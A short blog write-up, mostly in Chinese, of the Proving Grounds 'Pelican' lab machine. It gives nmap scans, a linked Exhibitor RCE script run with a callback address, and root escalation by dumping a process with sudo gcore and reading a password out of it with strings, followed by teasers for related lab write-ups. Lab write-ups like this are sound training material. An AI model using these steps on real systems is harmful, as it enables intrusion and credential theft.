Loading...

Proving Grounds Pelican Writeup

Created2024-07-26|Updated2024-11-17|Lab Writeup

|Word Count:135|Reading Time:1mins|Post Views:

Recon:

1	nmap 192.168.162.98 -Pn -n -sT --min-rate 2000

1	nmap 192.168.162.98 -p 22,139,445,631,2222,8080,8081 -sC -sV -Pn

GetShell:

访问8081会重定向到8080web服务:

中间件名为Exhibitor，在谷歌上可以找到一个exploit:

1	https://github.com/thehunt1s0n/Exihibitor-RCE

1	bash exploit.sh 192.168.162.98 8080 192.168.45.172 443

Getroot:

执行sudo -l 可以发现一个提权向量:

搜寻gcore的相关用法，如下：

1	sudo /usr/bin/gcore -a -o result 496

输出文件core.496为乱码，使用字符串格式打开：

1	strings core.496

可以i切换至root:

Author: Annabelle

Link: https://anneballa.github.io/posts/c5316feb54a6/

Copyright Notice: All articles on this blog are licensed under CC BY-NC-SA 4.0 unless otherwise stated.

Proving Grounds

Sponsor

wechat
alipay

Related Articles

Proving Grounds Access Writeup

Recon:对端口进行扫描探测： 1nmap 192.168.203.187 -p- -Pn -n -sT --min-rate 2000 1nmap 192.168.203.187 -sC -sV -p 53,80,88,135,139,389,445,464,593,636,3268 -Pn 根据扫描结果来看，目标域名为access.offsec。 GetFlag:搜集目录信息，发现有趣的URL： 1dirsearch -u http://access.offsec/ 1234http://access.offsec/cgi-bin/printenv.plhttp://access.offsec/uploads/http://access.offsec/assets/http://access.offsec/forms/ 获取到站点绝对路径：点击网页的Buy...

Proving Grounds Clue Writeup

Proving Grounds - ClueRecon GetShell打开3000端口：右上角是一个CQL查询的接口，页面显示版本号为3.11.13，搜索漏洞：这个版本号不一定是Cassandra的版本号，有可能是那个集群id的版本，所以exploit DB中的文件读取poc可以尝试一下：目标机器上存在两个用户，cassie与anthony。根据漏洞脚本的提示：读取/proc/self/cmdline: 没什么效果。搜素8021上的服务指纹，找到一个命令注入：但是他需要密码：所以大概思路就是，利用文件读取漏洞却尝试读取密码，最后发现密码文件在：对RCE利用脚本进行更改：反弹shell：发现3000端口才能出站。升级交互式shell：发现用户ssh密钥：可以用文件读取漏洞去获取：这是root用户的密钥：

Proving Grounds Slort Writeup

Recon:1nmap 192.168.196.53 -p- -Pn --min-rate 2000 -sT -n ![image-20240706195058310]https://anneballa.github.io/pageimgs/oldimage/image-20240706195058310.png) 1nmap 192.168.196.53 -p21,135,139,445,3306,4443,5040,7680,8080 -sC -sV ![image-20240706200131088]https://anneballa.github.io/pageimgs/oldimage/image-20240706200131088.png) GetFlag:枚举目录： 1dirsearch -u...

Comments

Loading Database